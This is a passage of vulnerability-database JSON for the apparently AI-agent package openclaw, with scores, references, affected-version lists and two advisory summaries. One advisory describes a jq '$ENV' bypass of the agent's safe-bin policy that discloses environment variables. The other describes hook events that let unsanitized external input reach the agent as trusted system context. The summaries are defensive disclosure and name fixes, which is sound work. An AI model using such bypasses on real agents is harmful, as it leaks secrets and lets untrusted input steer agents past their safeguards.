                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-insufficient-environment-variable-sanitization-in-host-execution",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T15:01:58Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-insufficient-environment-variable-sanitization-in-host-execution"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-cg7q-fg22-4g98",
                    "reference_id": "GHSA-cg7q-fg22-4g98",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-cg7q-fg22-4g98"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41369",
                "GHSA-cg7q-fg22-4g98"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zb5t-hhkm-kfeh"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90951?format=api",
            "vulnerability_id": "VCID-zf3q-78js-k7ce",
            "summary": "OpenClaw safeBins jq `$ENV` filter bypass allows environment variable disclosure\n## Summary\n\nThe jq safe-bin policy blocked explicit `env` usage but still allowed jq programs that accessed environment data through `$ENV`.\n\n## Impact\n\nAn operator-approved safe-bin jq command could disclose environment variables that the safe-bin policy was supposed to keep out of scope.\n\n## Affected Component\n\n`src/infra/exec-safe-bin-semantics.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `78e2f3d66d` (`Exec: tighten jq safe-bin env checks`).\n\nThanks @nicky-cc  of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/78e2f3d66d74e5c7e6f45c54162e63986e39771b",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/78e2f3d66d74e5c7e6f45c54162e63986e39771b"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jccr-rrw2-vc8h",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jccr-rrw2-vc8h"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-jccr-rrw2-vc8h",
                    "reference_id": "GHSA-jccr-rrw2-vc8h",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-jccr-rrw2-vc8h"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "GHSA-jccr-rrw2-vc8h"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zf3q-78js-k7ce"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89446?format=api",
            "vulnerability_id": "VCID-zg68-u5b5-vkft",
            "summary": "OpenClaw: Agent hook events could enqueue trusted system events from unsanitized external input\n## Summary\n\nAgent hook events could enqueue trusted system events from unsanitized external input.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nAgent hook dispatch could turn externally supplied hook metadata into trusted system events, allowing untrusted input to enter the agent as higher-trust context.\n\n## Technical Details\n\nThe fix sanitizes hook names and marks agent hook system events as untrusted before enqueueing them.\n\n## Fix\n\nThe issue was fixed in #64372. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `e3a845bde5b54f4f1e742d0a51ba9860f9619b29`\n- PR: #64372\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43534",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00021",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05997",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00023",
                            "scoring_system": "epss",
                            "scoring_elements": "0.06623",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00023",
                            "scoring_system": "epss",
                            "scoring_elements": "0.06635",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43534"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "6.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/e3a845bde5b54f4f1e742d0a51ba9860f9619b29",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "6.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-06T14:12:17Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/e3a845bde5b54f4f1e742d0a51ba9860f9619b29"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/64372",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "6.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/64372"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7g8c-cfr3-vqqr",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-06T14:12:17Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7g8c-cfr3-vqqr"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43534",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "6.6",
                            "scoring_system": "cvssv4",
